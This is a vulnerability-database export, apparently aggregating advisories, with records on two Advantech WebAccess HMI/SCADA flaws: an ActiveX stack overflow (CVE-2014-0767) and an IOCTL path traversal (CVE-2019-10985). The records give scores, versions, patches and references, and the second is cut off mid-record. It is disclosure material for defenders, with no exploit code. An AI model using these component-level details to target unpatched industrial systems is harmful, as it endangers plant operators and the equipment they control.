Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" }, { "_id": null, "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" } ], "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "BID", "id": "66728" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "CNNVD", "id": "CNNVD-201404-173" }, { "db": "NVD", "id": "CVE-2014-0767" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001978" } ] }, "credits": { "_id": null, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-074" } ], "trust": 0.7 }, "cve": "CVE-2014-0767", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0767", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02244", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1681e714-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68260", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0767", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0767", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0767", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02244", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-173", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68260", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "VULHUB", "id": "VHN-68260" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "CNNVD", "id": "CNNVD-201404-173" }, { "db": "NVD", "id": "CVE-2014-0767" } ] }, "description": { "_id": null, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0767" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "BID", "id": "66728" }, { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68260" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0767", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "BID", "id": "66728", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201404-173", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-02244", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001978", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2012", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-074", "trust": 0.7 }, { "db": "OSVDB", "id": "105566", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "31A3EFA0-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "1681E714-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68260", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "VULHUB", "id": "VHN-68260" }, { "db": "BID", "id": "66728" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "CNNVD", "id": "CNNVD-201404-173" }, { "db": "NVD", "id": "CVE-2014-0767" } ] }, "id": "VAR-201404-0542", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "VULHUB", "id": "VHN-68260" } ], "trust": 1.7511770050000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02244" } ] }, "last_update_date": "2024-11-23T21:45:11.336000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess AccessCode parameter handling stack buffer overflow vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44782" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68260" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "NVD", "id": "CVE-2014-0767" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66728" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0767" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0767" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105566" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-074" }, { "db": "CNVD", "id": "CNVD-2014-02244" }, { "db": "VULHUB", "id": "VHN-68260" }, { "db": "JVNDB", "id": "JVNDB-2014-001978" }, { "db": "CNNVD", "id": "CNNVD-201404-173" }, { "db": "NVD", "id": "CVE-2014-0767" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-074", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02244", "ident": null }, { "db": "VULHUB", "id": "VHN-68260", "ident": null }, { "db": "BID", "id": "66728", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001978", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-173", "ident": null }, { "db": "NVD", "id": "CVE-2014-0767", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-074", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02244", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68260", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66728", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001978", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-173", "ident": null }, { "date": "2014-04-12T04:37:31.567000", "db": "NVD", "id": "CVE-2014-0767", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-074", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02244", "ident": null }, { "date": "2015-07-09T00:00:00", "db": "VULHUB", "id": "VHN-68260", "ident": null }, { "date": "2014-04-17T00:40:00", "db": "BID", "id": "66728", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001978", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-173", "ident": null }, { "date": "2024-11-21T02:02:46.427000", "db": "NVD", "id": "CVE-2014-0767", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-173" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess AccessCode Parameter Handling Stack Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02244" } ], "trust": 1.0 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "31a3efa0-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1681e714-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-173" } ], "trust": 1.0 } }
var-201906-1025
Vulnerability from variot
In WebAccess/SCADA, Versions 8.3.5 and prior, a path traversal vulnerability is caused by a lack of proper validation of a user-supplied path prior to use in file operations. An attacker can leverage this vulnerability to delete files while posing as an administrator. WebAccess/SCADA Contains a path traversal vulnerability.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "NVD", "id": "CVE-2019-10985" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005816" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-622" } ], "trust": 0.7 }, "cve": "CVE-2019-10985", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2019-10985", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2019-32476", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "ca331763-0568-4e00-aca9-d10db9f939d6", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-142586", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-10985", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2019-10985", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2019-10985", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-10985", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-10985", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2019-10985", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2019-32476", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201906-1074", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-142586", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "VULHUB", "id": "VHN-142586" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" }, { "db": "NVD", "id": "CVE-2019-10985" } ] }, "description": { "_id": null, "data": "In WebAccess/SCADA, Versions 8.3.5 and prior, a path traversal vulnerability is caused by a lack of proper validation of a user-supplied path prior to use in file operations. An attacker can leverage this vulnerability to delete files while posing as an administrator. WebAccess/SCADA Contains a path traversal vulnerability.Information may be tampered with. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2715 IOCTL in the webvrpcs process. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. Multiple heap-based buffer-overflow vulnerabilities\n4. An information disclosure vulnerability\n5. Multiple remote-code execution vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (\u00e2??../\u00e2??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. \nAdvantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2019-10985" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "BID", "id": "108923" }, { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "VULHUB", "id": "VHN-142586" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-10985", "trust": 4.3 }, { "db": "ZDI", "id": "ZDI-19-622", "trust": 3.0 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201906-1074", "trust": 0.9 }, { "db": "BID", "id": "108923", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32476", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005816", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8194", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "IVD", "id": "CA331763-0568-4E00-ACA9-D10DB9F939D6", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142586", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "VULHUB", "id": "VHN-142586" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" }, { "db": "NVD", "id": "CVE-2019-10985" } ] }, "id": "VAR-201906-1025", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "VULHUB", "id": "VHN-142586" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "CNVD", "id": "CNVD-2019-32476" } ] }, "last_update_date": "2024-11-23T21:52:09.506000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Patch for Advantech WebAccess/SCADA Path Traversal Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181493" }, { "title": "Advantech WebAccess/SCADA Repair measures for path traversal vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=94177" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142586" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "NVD", "id": "CVE-2019-10985" } ] }, "references": { "_id": null, "data": [ { "trust": 3.5, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 2.3, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-622/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10985" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10985" }, { "trust": 0.6, "url": "https://www.securityfocus.com/bid/108923" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-622" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "VULHUB", "id": "VHN-142586" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005816" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" }, { "db": "NVD", "id": "CVE-2019-10985" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6", "ident": null }, { "db": "ZDI", "id": "ZDI-19-622", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32476", "ident": null }, { "db": "VULHUB", "id": "VHN-142586", "ident": null }, { "db": "BID", "id": "108923", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-005816", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201906-1074", "ident": null }, { "db": "NVD", "id": "CVE-2019-10985", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-622", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32476", "ident": null }, { "date": "2019-06-28T00:00:00", "db": "VULHUB", "id": "VHN-142586", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005816", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1074", "ident": null }, { "date": "2019-06-28T21:15:11.117000", "db": "NVD", "id": "CVE-2019-10985", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-622", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32476", "ident": null }, { "date": 